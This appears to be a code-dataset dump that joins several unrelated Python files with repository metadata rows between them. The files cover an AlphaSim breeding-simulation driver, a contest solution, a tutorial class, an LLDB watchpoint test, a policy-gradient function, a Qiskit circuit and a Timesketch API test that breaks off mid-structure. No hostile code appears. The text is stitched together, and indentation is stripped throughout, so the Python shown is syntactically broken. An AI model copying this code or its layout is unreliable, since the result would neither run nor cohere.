AlphaSimPed = raw_input("Vnesi pot do output AlphaSim pedigrejev im ime file")
AlphaSimPed = "/home/jana/Documents/PhD/Simulaton/Pedigrees/Pedigree_10burnIn_10gen.txt"
AlphaSimPed = '/home/jana/bin/AlphaSim1.05Linux/SimulatedData/PedigreeAndGeneticValues.txt'
"""
if OPTION == 1:
for krog in StKrogov:
#PRERAČUNAŠ EBV v Ru in ZAPIŠEŠ PEDIGRE
shutil.copy ("Rcorr_PedEBV.R", "Rcorr_PedEBV_ThisGen.R")
os.system('sed -i "s|AlphaSimPed|' + AlphaSimPed + '|g" Rcorr_PedEBV_ThisGen.R')
call('Rscript Rcorr_PedEBV_ThisGen.R', shell=True)
selekcija_ena_gen('GenPed_EBV.txt') #to ti določi kategorije in starše
#prestavi se v AlphaSim Dir
os.chdir(AlphaSimDir)
#TUKAJ POTEM POPRAVIŠ AlphaSimSpec
#tukaj poženeš prvič po burn inu
os.system('sed -i "s|StartStopGeneration ,1,' + str(StBurnInGen) + '|StartStopGeneration ,' + str(StBurnInGen+1) + ',' + str(StBurnInGen+1) + '|g" Rcorr_PedEBV_ThisGen.R')
os.system('sed -i "s|Internal|ExternalPedigree_NextGen.txt|g" AlphaSimSpec.txt')
#POŽENEŠ ALPHASIM
os.system('./AlphaSim1.05')
"""
if OPTION == 2:
BurnInYN = raw_input("Do you already have a burn in population? [Y/N] ")
if BurnInYN == 'N':
for roundNo in range(StSelGen+1):
if roundNo == 0: #do burn in
#prestavi se v AlphaSim Dir
os.chdir(AlphaSimDir)
shutil.copy('/home/jana/Genotipi/Genotipi_CODES/AlphaSimSpec.txt', AlphaSimDir)
os.system('sed -i "s|PedigreeType|Internal|g" AlphaSimSpec.txt')
os.system('sed -i "s|EnterBurnInGenerationNumber|' + str(StBurnInGen) + '|g" AlphaSimSpec.txt')
os.system('sed -i "s|EnterSelectionGenerationNumber|' + str(StSelGen) + '|g" AlphaSimSpec.txt')
os.system('sed -i "s|EnterNumberOfSires|' + str(NumberOfSires) + '|g" AlphaSimSpec.txt')
os.system('sed -i "s|EnterNumberOfDams|' + str(NumberOfDams) + '|g" AlphaSimSpec.txt')
os.system('sed -i "s|TurnOnGenFlex|On|g" AlphaSimSpec.txt')
os.system('sed -i "s|StartFlexGen,StopFlexGen|1,' + str(StBurnInGen + 1) + '|g" AlphaSimSpec.txt')
os.system('sed -i "s|TurnOnSelFlex|On|g" AlphaSimSpec.txt')
os.system('sed -i "s|TheImportedGenerationPed|' + str(StBurnInGen + 1) + '|g" AlphaSimSpec.txt')
os.system('sed -i "s|TBVComputation|1|g" AlphaSimSpec.txt')
os.system('sed -i "s|EnterIndividualInPopulation|' +str(stNB)+ '|g" AlphaSimSpec.txt')
#POŽENEŠ ALPHASIM
os.system('./AlphaSim1.05')
elif roundNo == 1:
os.chdir('/home/jana/Genotipi/Genotipi_CODES/')
#PRERAČUNAŠ EBV v Ru in ZAPIŠEŠ PEDIGRE
shutil.copy ("Rcorr_PedEBV.R", "Rcorr_PedEBV_ThisGen.R")
os.system('sed -i "s|AlphaSimPed|' + AlphaSimPed + '|g" Rcorr_PedEBV_ThisGen.R')
call('Rscript Rcorr_PedEBV_ThisGen.R', shell=True)
#tukaj nastvaiš začetne kategorije
global ped, categories, sex, active
ped, categories, sex, active = nastavi_cat('GenPed_EBV.txt')
#prestavi se v AlphaSim Dir
os.chdir(AlphaSimDir)
#kopiraj pedigre v selection folder
shutil.copy('ExternalPedigree.txt', AlphaSimDir + '/Selection/SelectionFolder' + str(roundNo) + '/')
#TUKAJ POTEM POPRAVIŠ AlphaSimSpec
#PRVIČ PO BURN IN-U
shutil.copy('/home/jana/Genotipi/Genotipi_CODES/AlphaSimSpec.txt', AlphaSimDir)
os.system('sed -i "s|PedigreeType|ExternalPedigree.txt|g" AlphaSimSpec.txt')
os.system('sed -i "s|EnterBurnInGenerationNumber|' + str(StBurnInGen) + '|g" AlphaSimSpec.txt')
os.system('sed -i "s|EnterSelectionGenerationNumber|' + str(StSelGen) + '|g" AlphaSimSpec.txt')
os.system('sed -i "s|EnterNumberOfSires|0|g" AlphaSimSpec.txt')
os.system('sed -i "s|EnterNumberOfDams|0|g" AlphaSimSpec.txt')
os.system('sed -i "s|TurnOnGenFlex|On|g" AlphaSimSpec.txt')
os.system('sed -i "s|StartFlexGen,StopFlexGen|' +str(StBurnInGen + roundNo)+ ','+ str(StBurnInGen + roundNo) + '|g" AlphaSimSpec.txt')
os.system('sed -i "s|TurnOnSelFlex|On|g" AlphaSimSpec.txt')
os.system('sed -i "s|TheImportedGenerationPed|' + str(StBurnInGen + roundNo) + '|g" AlphaSimSpec.txt')
os.system('sed -i "s|TBVComputation|2|g" AlphaSimSpec.txt')
os.system('sed -i "s|EnterIndividualInPopulation|' +str(stNB)+ '|g" AlphaSimSpec.txt')
#POŽENEŠ ALPHASIM
os.system('./AlphaSim1.05')
elif roundNo > 1:
os.chdir('/home/jana/Genotipi/Genotipi_CODES/')
#PRERAČUNAŠ EBV v Ru in ZAPIŠEŠ PEDIGRE
shutil.copy ("Rcorr_PedEBV.R", "Rcorr_PedEBV_ThisGen.R")
os.system('sed -i "s|AlphaSimPed|' + AlphaSimPed + '|g" Rcorr_PedEBV_ThisGen.R')
call('Rscript Rcorr_PedEBV_ThisGen.R', shell=True)
#tukaj nastvaiš začetne kategorije
global ped, categories, sex, active
ped, categories, sex, active = selekcija_ena_gen('GenPed_EBV.txt')
#prestavi se v AlphaSim Dir
os.chdir(AlphaSimDir)
#kopiraj pedigre v selection folder
shutil.copy('ExternalPedigree.txt', AlphaSimDir + '/Selection/SelectionFolder' + str(roundNo) + '/')
#TUKAJ POTEM POPRAVIŠ AlphaSimSpec
#PRVIČ PO BURN IN-U
shutil.copy('/home/jana/Genotipi/Genotipi_CODES/AlphaSimSpec.txt', AlphaSimDir)
os.system('sed -i "s|PedigreeType|ExternalPedigree.txt|g" AlphaSimSpec.txt')
os.system('sed -i "s|EnterBurnInGenerationNumber|' + str(StBurnInGen) + '|g" AlphaSimSpec.txt')
os.system('sed -i "s|EnterSelectionGenerationNumber|' + str(StSelGen) + '|g" AlphaSimSpec.txt')
os.system('sed -i "s|EnterNumberOfSires|0|g" AlphaSimSpec.txt')
os.system('sed -i "s|EnterNumberOfDams|0|g" AlphaSimSpec.txt')
os.system('sed -i "s|TurnOnGenFlex|On|g" AlphaSimSpec.txt')
os.system('sed -i "s|StartFlexGen,StopFlexGen|' +str(StBurnInGen + roundNo)+ ','+ str(StBurnInGen + roundNo) + '|g" AlphaSimSpec.txt')
os.system('sed -i "s|TurnOnSelFlex|On|g" AlphaSimSpec.txt')
os.system('sed -i "s|TheImportedGenerationPed|' + str(StBurnInGen + roundNo) + '|g" AlphaSimSpec.txt')
os.system('sed -i "s|TBVComputation|2|g" AlphaSimSpec.txt')
os.system('sed -i "s|EnterIndividualInPopulation|' +str(stNB)+ '|g" AlphaSimSpec.txt')
#POŽENEŠ ALPHASIM
os.system('./AlphaSim1.05')
if BurnInYN == 'Y':
for roundNo in range(6, (StSelGen+1)):
if roundNo == 1:
os.chdir('/home/jana/Genotipi/Genotipi_CODES/')
#PRERAČUNAŠ EBV v Ru in ZAPIŠEŠ PEDIGRE
shutil.copy ("Rcorr_PedEBV.R", "Rcorr_PedEBV_ThisGen.R")
os.system('sed -i "s|AlphaSimPed|' + AlphaSimPed + '|g" Rcorr_PedEBV_ThisGen.R')
call('Rscript Rcorr_PedEBV_ThisGen.R', shell=True)
#tukaj nastvaiš začetne kategorije
global ped, categories, sex, active
ped, categories, sex, active = nastavi_cat('GenPed_EBV.txt')
#prestavi se v AlphaSim Dir
os.chdir(AlphaSimDir)
#kopiraj pedigre v selection folder
shutil.copy('ExternalPedigree.txt', AlphaSimDir + '/Selection/SelectionFolder' + str(roundNo) + '/')
#TUKAJ POTEM POPRAVIŠ AlphaSimSpec
#PRVIČ PO BURN IN-U
shutil.copy('/home/jana/Genotipi/Genotipi_CODES/AlphaSimSpec.txt', AlphaSimDir)
os.system('sed -i "s|PedigreeType|ExternalPedigree.txt|g" AlphaSimSpec.txt')
os.system('sed -i "s|EnterBurnInGenerationNumber|' + str(StBurnInGen) + '|g" AlphaSimSpec.txt')
os.system('sed -i "s|EnterSelectionGenerationNumber|' + str(StSelGen) + '|g" AlphaSimSpec.txt')
os.system('sed -i "s|EnterNumberOfSires|0|g" AlphaSimSpec.txt')
os.system('sed -i "s|EnterNumberOfDams|0|g" AlphaSimSpec.txt')
os.system('sed -i "s|TurnOnGenFlex|On|g" AlphaSimSpec.txt')
os.system('sed -i "s|StartFlexGen,StopFlexGen|' +str(StBurnInGen + roundNo)+ ','+ str(StBurnInGen + roundNo) + '|g" AlphaSimSpec.txt')
os.system('sed -i "s|TurnOnSelFlex|On|g" AlphaSimSpec.txt')
os.system('sed -i "s|TheImportedGenerationPed|' + str(StBurnInGen + roundNo) + '|g" AlphaSimSpec.txt')
os.system('sed -i "s|TBVComputation|2|g" AlphaSimSpec.txt')
os.system('sed -i "s|EnterIndividualInPopulation|' +str(stNB)+ '|g" AlphaSimSpec.txt')
#POŽENEŠ ALPHASIM
os.system('./AlphaSim1.05')
elif roundNo > 1:
os.chdir('/home/jana/Genotipi/Genotipi_CODES/')
#PRERAČUNAŠ EBV v Ru in ZAPIŠEŠ PEDIGRE
shutil.copy ("Rcorr_PedEBV.R", "Rcorr_PedEBV_ThisGen.R")
os.system('sed -i "s|AlphaSimPed|' + AlphaSimPed + '|g" Rcorr_PedEBV_ThisGen.R')
call('Rscript Rcorr_PedEBV_ThisGen.R', shell=True)
#global ped, categories, sex, active
ped, categories, sex, active = selekcija_ena_gen('GenPed_EBV.txt', categories=categories, sex=sex, active=active)
#prestavi se v AlphaSim Dir
os.chdir(AlphaSimDir)
#kopiraj pedigre v selection folder
os.system('mkdir ' + AlphaSimDir + '/Selection/SelectionFolder' + str(roundNo))
shutil.copy('ExternalPedigree.txt', AlphaSimDir + '/Selection/SelectionFolder' + str(roundNo) + '/')
#TUKAJ POTEM POPRAVIŠ AlphaSimSpec
#PRVIČ PO BURN IN-U
shutil.copy('/home/jana/Genotipi/Genotipi_CODES/AlphaSimSpec.txt', AlphaSimDir)
os.system('sed -i "s|PedigreeType|ExternalPedigree.txt|g" AlphaSimSpec.txt')
os.system('sed -i "s|EnterBurnInGenerationNumber|' + str(StBurnInGen) + '|g" AlphaSimSpec.txt')
os.system('sed -i "s|EnterSelectionGenerationNumber|' + str(StSelGen) + '|g" AlphaSimSpec.txt')
os.system('sed -i "s|EnterNumberOfSires|0|g" AlphaSimSpec.txt')
os.system('sed -i "s|EnterNumberOfDams|0|g" AlphaSimSpec.txt')
os.system('sed -i "s|TurnOnGenFlex|On|g" AlphaSimSpec.txt')
os.system('sed -i "s|StartFlexGen,StopFlexGen|' +str(StBurnInGen + roundNo)+ ','+ str(StBurnInGen + roundNo) + '|g" AlphaSimSpec.txt')
os.system('sed -i "s|TurnOnSelFlex|On|g" AlphaSimSpec.txt')
os.system('sed -i "s|TheImportedGenerationPed|' + str(StBurnInGen + roundNo) + '|g" AlphaSimSpec.txt')
os.system('sed -i "s|TBVComputation|2|g" AlphaSimSpec.txt')
os.system('sed -i "s|EnterIndividualInPopulation|' +str(stNB)+ '|g" AlphaSimSpec.txt')
#POŽENEŠ ALPHASIM
os.system('./AlphaSim1.05')
###################################################################################################
###################################################################################################
###################################################################################################
###################################################################################################
#plot the results
#class TBVGenTable (SelectionTbvTest.txt)
from scipy import stats
import matplotlib.pyplot as plt
TBVmeans.clear()
TBVmeans = defaultdict(list)
for roundNo in range(1,rounds+1):
TBVt = TBVGenTable(AlphaSimDir + '/Selection/SelectionFolder' + str(roundNo) + '/SelectionTbvTest.txt')
TBVmeans[roundNo] = TBVt.TBVmean
TBV = TBVPed(AlphaSimDir)
gens, means, vars = TBV.genTrend(AlphaSimDir + '/Gen/SimulatedData/PedigreeAndGeneticValues.txt')
gensC, meansC, varsC = TBV.genTrend(AlphaSimDir + 'Class/SimulatedData/PedigreeAndGeneticValues.txt')
#plt.errorbar(x = TBV.gens, y = TBV.means, yerr = TBV.vars)
plt.plot( gens, means, label = 'Mean Gen TBV, gen')
plt.xlabel('Selected Generation')
plt.ylabel('Mean Generation TBV')
pylab.legend(loc='upper left')
plt.show()
plt.plot( gensC, meansC, label = 'Mean Gen TBV, class')
plt.xlabel('Selected Generation')
plt.ylabel('Mean Generation TBV')
pylab.legend(loc='upper left')
plt.show()
plt.plot(gens, vars, label = 'TBV Var gen')
pylab.legend(loc='upper left')
plt.xlabel('Selected Generation')
plt.ylabel('Generation TBV variance')
plt.show()
plt.plot(gensC, varsC, label = 'TBV Var class')
pylab.legend(loc='upper left')
plt.xlabel('Selected Generation')
plt.ylabel('Generation TBV variance')
plt.show()
| [
"obsteter.jana@gmail.com"
] | obsteter.jana@gmail.com |
08b77271f6d9e743446b11420b21694f8c5cb7a8 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02767/s509630790.py | 134d80c81b5f5cf92ccd09bce8a4d9e1b91e7af6 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 165 | py | N = int(input())
X_list = list(map(int, input().split()))
X_mean = round(sum(X_list) / N)
physical_sum = sum([(i - X_mean)**2 for i in X_list])
print(physical_sum) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
65e4cf82411c8c8153f0661d7ec0d14d2b426b00 | b29acb2e230b3cf2f8be070850c34ed5d62dc80c | /Python/YPS/Rensyu/08/Sample1.py | e365d37f505389fb63bb58af6d100aea58fe1491 | [] | no_license | MasatakaShibataSS/lesson | be6e3557c52c6157b303be268822cad613a7e0f7 | 4f3f81ba0161b820410e2a481b63a999d0d4338c | refs/heads/master | 2020-06-17T13:42:08.383167 | 2019-11-11T07:23:14 | 2019-11-11T07:23:14 | 195,940,605 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 471 | py | class Car():
def __init__(self, num, gas):
self.num = num
self.gas = gas
def getNumber(self):
return self.num
def getGas(self):
return self.gas
cr1 = Car(1234, 25.5)
n1 = cr1.getNumber()
g1 = cr1.getGas()
cr2 = Car(2345, 30.5)
n2 = cr2.getNumber()
g2 = cr2.getGas()
print("ナンバーは", n1, "ガソリン量は", g1, "です。")
print("ナンバーは", n2, "ガソリン量は", g2, "です。")
| [
"masataka.shibata.ss@gmail.com"
] | masataka.shibata.ss@gmail.com |
7078dcee082ede20fd630e1599955619f9c49a3f | 9c006bd8b1f628200a63a194000836505f50be9b | /tools/lldb/test/functionalities/watchpoint/watchpoint_commands/command/TestWatchpointCommandLLDB.py | d2ba2ae6056b494007615c201f3531a9de244e39 | [
"NCSA"
] | permissive | hoangt/NyuziToolchain | a66989a1b9c71a2df782f9c573b0da62d1e0e9cf | 400aae2a01d38a1e836d7be33211aa8525c87070 | refs/heads/master | 2020-12-24T23:29:11.747602 | 2015-08-30T00:06:09 | 2015-08-30T00:06:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,631 | py | """
Test 'watchpoint command'.
"""
import os, time
import unittest2
import lldb
from lldbtest import *
import lldbutil
class WatchpointLLDBCommandTestCase(TestBase):
mydir = TestBase.compute_mydir(__file__)
def setUp(self):
# Call super's setUp().
TestBase.setUp(self)
# Our simple source filename.
self.source = 'main.cpp'
# Find the line number to break inside main().
self.line = line_number(self.source, '// Set break point at this line.')
# And the watchpoint variable declaration line number.
self.decl = line_number(self.source, '// Watchpoint variable declaration.')
# Build dictionary to have unique executable names for each test method.
self.exe_name = 'a%d.out' % self.test_number
self.d = {'CXX_SOURCES': self.source, 'EXE': self.exe_name}
@skipUnlessDarwin
@dsym_test
def test_watchpoint_command_with_dsym(self):
"""Test 'watchpoint command'."""
self.buildDsym(dictionary=self.d)
self.setTearDownCleanup(dictionary=self.d)
self.watchpoint_command()
@dwarf_test
@expectedFailureAndroid(archs=['arm', 'aarch64']) # Watchpoints not supported
def test_watchpoint_command_with_dwarf(self):
"""Test 'watchpoint command'."""
self.buildDwarf(dictionary=self.d)
self.setTearDownCleanup(dictionary=self.d)
self.watchpoint_command()
@skipUnlessDarwin
@dsym_test
def test_watchpoint_command_can_disable_a_watchpoint_with_dsym(self):
"""Test that 'watchpoint command' action can disable a watchpoint after it is triggered."""
self.buildDsym(dictionary=self.d)
self.setTearDownCleanup(dictionary=self.d)
self.watchpoint_command_can_disable_a_watchpoint()
@dwarf_test
@expectedFailureAndroid(archs=['arm', 'aarch64']) # Watchpoints not supported
def test_watchpoint_command_can_disable_a_watchpoint_with_dwarf(self):
"""Test that 'watchpoint command' action can disable a watchpoint after it is triggered."""
self.buildDwarf(dictionary=self.d)
self.setTearDownCleanup(dictionary=self.d)
self.watchpoint_command_can_disable_a_watchpoint()
def watchpoint_command(self):
"""Do 'watchpoint command add'."""
exe = os.path.join(os.getcwd(), self.exe_name)
self.runCmd("file " + exe, CURRENT_EXECUTABLE_SET)
# Add a breakpoint to set a watchpoint when stopped on the breakpoint.
lldbutil.run_break_set_by_file_and_line (self, None, self.line, num_expected_locations=1)
# Run the program.
self.runCmd("run", RUN_SUCCEEDED)
# We should be stopped again due to the breakpoint.
# The stop reason of the thread should be breakpoint.
self.expect("thread list", STOPPED_DUE_TO_BREAKPOINT,
substrs = ['stopped',
'stop reason = breakpoint'])
# Now let's set a write-type watchpoint for 'global'.
self.expect("watchpoint set variable -w write global", WATCHPOINT_CREATED,
substrs = ['Watchpoint created', 'size = 4', 'type = w',
'%s:%d' % (self.source, self.decl)])
self.runCmd('watchpoint command add 1 -o "expr -- cookie = 777"')
# List the watchpoint command we just added.
self.expect("watchpoint command list 1",
substrs = ['expr -- cookie = 777'])
# Use the '-v' option to do verbose listing of the watchpoint.
# The hit count should be 0 initially.
self.expect("watchpoint list -v",
substrs = ['hit_count = 0'])
self.runCmd("process continue")
# We should be stopped again due to the watchpoint (write type).
# The stop reason of the thread should be watchpoint.
self.expect("thread backtrace", STOPPED_DUE_TO_WATCHPOINT,
substrs = ['stop reason = watchpoint'])
# Check that the watchpoint snapshoting mechanism is working.
self.expect("watchpoint list -v",
substrs = ['old value:', ' = 0',
'new value:', ' = 1'])
# The watchpoint command "forced" our global variable 'cookie' to become 777.
self.expect("frame variable --show-globals cookie",
substrs = ['(int32_t)', 'cookie = 777'])
def watchpoint_command_can_disable_a_watchpoint(self):
"""Test that 'watchpoint command' action can disable a watchpoint after it is triggered."""
exe = os.path.join(os.getcwd(), self.exe_name)
self.runCmd("file " + exe, CURRENT_EXECUTABLE_SET)
# Add a breakpoint to set a watchpoint when stopped on the breakpoint.
lldbutil.run_break_set_by_file_and_line (self, None, self.line, num_expected_locations=1)
# Run the program.
self.runCmd("run", RUN_SUCCEEDED)
# We should be stopped again due to the breakpoint.
# The stop reason of the thread should be breakpoint.
self.expect("thread list", STOPPED_DUE_TO_BREAKPOINT,
substrs = ['stopped',
'stop reason = breakpoint'])
# Now let's set a write-type watchpoint for 'global'.
self.expect("watchpoint set variable -w write global", WATCHPOINT_CREATED,
substrs = ['Watchpoint created', 'size = 4', 'type = w',
'%s:%d' % (self.source, self.decl)])
self.runCmd('watchpoint command add 1 -o "watchpoint disable 1"')
# List the watchpoint command we just added.
self.expect("watchpoint command list 1",
substrs = ['watchpoint disable 1'])
# Use the '-v' option to do verbose listing of the watchpoint.
# The hit count should be 0 initially.
self.expect("watchpoint list -v",
substrs = ['hit_count = 0'])
self.runCmd("process continue")
# We should be stopped again due to the watchpoint (write type).
# The stop reason of the thread should be watchpoint.
self.expect("thread backtrace", STOPPED_DUE_TO_WATCHPOINT,
substrs = ['stop reason = watchpoint'])
# Check that the watchpoint has been disabled.
self.expect("watchpoint list -v",
substrs = ['disabled'])
self.runCmd("process continue")
# There should be no more watchpoint hit and the process status should
# be 'exited'.
self.expect("process status",
substrs = ['exited'])
if __name__ == '__main__':
import atexit
lldb.SBDebugger.Initialize()
atexit.register(lambda: lldb.SBDebugger.Terminate())
unittest2.main()
| [
"jeffbush001@gmail.com"
] | jeffbush001@gmail.com |
7cf33ffd307ec8485e367021e0c782dd7af726bb | 27a580304382e3a79c7307f42a83b689566dbf30 | /reinforcement_learning/0x03-policy_gradients/policy_gradient.py | dff87a11d16bf082c2455db22eacbd163879aa68 | [] | no_license | salmenz/holbertonschool-machine_learning | a37712a125cd2e9e4bd6975c3bb2338f3533474f | a49eb348ff994f35b0efbbd5ac3ac8ae8ccb57d2 | refs/heads/master | 2023-07-11T06:00:36.162782 | 2021-08-11T17:45:35 | 2021-08-11T17:45:35 | 279,366,817 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 662 | py | #!/usr/bin/env python3
"""policy gradient"""
import numpy as np
def policy(matrix, weight):
"""compute to policy with a weight of a matrix"""
z = matrix.dot(weight)
exp = np.exp(z)
return exp / np.sum(exp)
def softmax_grad(softmax):
"""softmax"""
s = softmax.reshape(-1, 1)
return np.diagflat(s) - np.dot(s, s.T)
def policy_gradient(state, weight):
"""compute the Monte-Carlo policy gradient"""
action = np.argmax(policy(state, weight))
softmax = softmax_grad(policy(state, weight))[action, :]
log = softmax / policy(state, weight)[0, action]
gradient = state.T.dot(log[None, :])
return (action, gradient)
| [
"salmen.zooro@gmail.com"
] | salmen.zooro@gmail.com |
78c81bf41eaa5f3d6619327d769a73f98ac9db0b | 09e57dd1374713f06b70d7b37a580130d9bbab0d | /benchmark/startQiskit1616.py | 5f4d304cc7b1179048c26042ec6efbd6cdbd56f6 | [
"BSD-3-Clause"
] | permissive | UCLA-SEAL/QDiff | ad53650034897abb5941e74539e3aee8edb600ab | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | refs/heads/main | 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,491 | py | # qubit number=5
# total number=60
import cirq
import qiskit
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute, transpile
from pprint import pprint
from qiskit.test.mock import FakeVigo
from math import log2,floor, sqrt, pi
import numpy as np
import networkx as nx
def build_oracle(n: int, f) -> QuantumCircuit:
# implement the oracle O_f^\pm
# NOTE: use U1 gate (P gate) with \lambda = 180 ==> CZ gate
# or multi_control_Z_gate (issue #127)
controls = QuantumRegister(n, "ofc")
oracle = QuantumCircuit(controls, name="Zf")
for i in range(2 ** n):
rep = np.binary_repr(i, n)
if f(rep) == "1":
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.h(controls[n])
if n >= 2:
oracle.mcu1(pi, controls[1:], controls[0])
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.barrier()
return oracle
def make_circuit(n:int,f) -> QuantumCircuit:
# circuit begin
input_qubit = QuantumRegister(n,"qc")
classical = ClassicalRegister(n, "qm")
prog = QuantumCircuit(input_qubit, classical)
prog.h(input_qubit[0]) # number=3
prog.h(input_qubit[1]) # number=4
prog.h(input_qubit[2]) # number=5
prog.h(input_qubit[3]) # number=6
prog.h(input_qubit[0]) # number=38
prog.cz(input_qubit[1],input_qubit[0]) # number=39
prog.h(input_qubit[0]) # number=40
prog.h(input_qubit[0]) # number=49
prog.cz(input_qubit[1],input_qubit[0]) # number=50
prog.h(input_qubit[0]) # number=51
prog.cx(input_qubit[1],input_qubit[0]) # number=52
prog.z(input_qubit[1]) # number=53
prog.h(input_qubit[0]) # number=57
prog.cz(input_qubit[1],input_qubit[0]) # number=58
prog.h(input_qubit[0]) # number=59
prog.cx(input_qubit[1],input_qubit[0]) # number=47
prog.h(input_qubit[0]) # number=32
prog.cz(input_qubit[1],input_qubit[0]) # number=33
prog.h(input_qubit[0]) # number=34
prog.x(input_qubit[4]) # number=48
prog.h(input_qubit[4]) # number=21
Zf = build_oracle(n, f)
repeat = floor(sqrt(2 ** n) * pi / 4)
for i in range(repeat):
prog.append(Zf.to_gate(), [input_qubit[i] for i in range(n)])
prog.h(input_qubit[0]) # number=1
prog.h(input_qubit[1]) # number=2
prog.h(input_qubit[2]) # number=7
prog.h(input_qubit[3]) # number=8
prog.cx(input_qubit[3],input_qubit[0]) # number=41
prog.z(input_qubit[3]) # number=42
prog.cx(input_qubit[3],input_qubit[0]) # number=43
prog.cx(input_qubit[1],input_qubit[3]) # number=44
prog.x(input_qubit[0]) # number=9
prog.h(input_qubit[1]) # number=56
prog.x(input_qubit[1]) # number=10
prog.x(input_qubit[2]) # number=11
prog.rx(-2.9845130209103035,input_qubit[4]) # number=55
prog.cx(input_qubit[0],input_qubit[3]) # number=35
prog.x(input_qubit[3]) # number=36
prog.cx(input_qubit[0],input_qubit[3]) # number=37
if n>=2:
prog.mcu1(pi,input_qubit[1:],input_qubit[0])
prog.cx(input_qubit[1],input_qubit[0]) # number=24
prog.x(input_qubit[0]) # number=25
prog.cx(input_qubit[1],input_qubit[0]) # number=26
prog.x(input_qubit[1]) # number=14
prog.x(input_qubit[2]) # number=15
prog.x(input_qubit[3]) # number=16
prog.h(input_qubit[0]) # number=17
prog.h(input_qubit[1]) # number=18
prog.h(input_qubit[2]) # number=19
prog.h(input_qubit[3]) # number=20
prog.x(input_qubit[1]) # number=22
prog.x(input_qubit[1]) # number=23
# circuit end
for i in range(n):
prog.measure(input_qubit[i], classical[i])
return prog
if __name__ == '__main__':
key = "00000"
f = lambda rep: str(int(rep == key))
prog = make_circuit(5,f)
backend = BasicAer.get_backend('qasm_simulator')
sample_shot =7924
info = execute(prog, backend=backend, shots=sample_shot).result().get_counts()
backend = FakeVigo()
circuit1 = transpile(prog,backend,optimization_level=2)
writefile = open("../data/startQiskit1616.csv","w")
print(info,file=writefile)
print("results end", file=writefile)
print(circuit1.depth(),file=writefile)
print(circuit1,file=writefile)
writefile.close()
| [
"wangjiyuan123@yeah.net"
] | wangjiyuan123@yeah.net |
016174c973cc6d5cc9d0073c0db0aed68af4d195 | 75d54a70d42f3790e917569172cde9b6969468cb | /timesketch/api/v1/resources_test.py | 13bf2ad68618a276a6b564f944363ea42a521818 | [
"Apache-2.0"
] | permissive | MarVinPL/timesketch | 792be04b8c9b1cab50bb6b5bf0096498bbc71b5b | 3c63cacef0f4ed4bbe826903ee5d708cc0502bb3 | refs/heads/master | 2021-01-15T20:33:36.816774 | 2015-03-26T08:53:27 | 2015-03-26T08:53:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,786 | py | # Copyright 2015 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for v1 of the Timesketch API."""
import mock
import json
from timesketch.lib.definitions import HTTP_STATUS_CODE_CREATED
from timesketch.lib.definitions import HTTP_STATUS_CODE_BAD_REQUEST
from timesketch.lib.testlib import BaseTest
from timesketch.lib.testlib import MockDataStore
class SketchListResourceTest(BaseTest):
"""Test SketchListResource."""
resource_url = '/api/v1/sketches/'
def test_sketch_list_resource(self):
"""Authenticated request to get list of sketches."""
self.login()
response = self.client.get(self.resource_url)
self.assertEqual(len(response.json['objects']), 1)
self.assertEqual(
response.json['objects'][0][0]['name'], 'Test 1')
self.assert200(response)
class SketchResourceTest(BaseTest):
"""Test SketchResource."""
resource_url = '/api/v1/sketches/1/'
def test_sketch_resource(self):
"""Authenticated request to get a sketch."""
self.login()
response = self.client.get(self.resource_url)
self.assertEqual(len(response.json['objects']), 1)
self.assertEqual(len(response.json['objects'][0]['timelines']), 1)
self.assertEqual(response.json['objects'][0]['name'], 'Test 1')
self.assert200(response)
def test_sketch_acl(self):
"""
Authenticated request to get a sketch that the user do not have read
permission on.
"""
self.login()
response = self.client.get('/api/v1/sketches/2/')
self.assert403(response)
class ViewListResourceTest(BaseTest):
"""Test ViewListResource."""
resource_url = '/api/v1/sketches/1/views/'
def test_post_view_resource(self):
"""Authenticated request to create a view."""
self.login()
data = dict(name='test', query='test', filter='{}')
response = self.client.post(
self.resource_url, data=json.dumps(data),
content_type='application/json')
self.assertEquals(response.status_code, HTTP_STATUS_CODE_CREATED)
class ViewResourceTest(BaseTest):
"""Test ViewResource."""
resource_url = '/api/v1/sketches/1/views/1/'
def test_view_resource(self):
"""Authenticated request to get a view."""
self.login()
response = self.client.get(self.resource_url)
self.assertEqual(len(response.json['objects']), 1)
self.assertEqual(response.json['objects'][0]['name'], 'View 1')
self.assert200(response)
def test_invalid_user_in_view(self):
"""Authenticated request to get a view for another user."""
self.login()
response = self.client.get('/api/v1/sketches/1/views/3/')
self.assert403(response)
def test_invalid_view(self):
"""Authenticated request to get a view for non existing view."""
self.login()
response = self.client.get('/api/v1/sketches/1/views/2/')
self.assert404(response)
class ExploreResourceTest(BaseTest):
"""Test ExploreResource."""
resource_url = '/api/v1/sketches/1/explore/'
expected_response = {
u'meta': {
u'timeline_names': {
u'test': u'Timeline 1'
},
u'timeline_colors': {
u'test': u'FFFFFF'
},
u'es_total_count': 1,
u'es_time': 5
},
u'objects': [
{
u'sort': [
1410593223000
],
u'_type': u'plaso_event',
u'_source': {
u'timestamp': 1410593222543942,
u'message': u'Test event',
u'label': [
u'__ts_star'
],
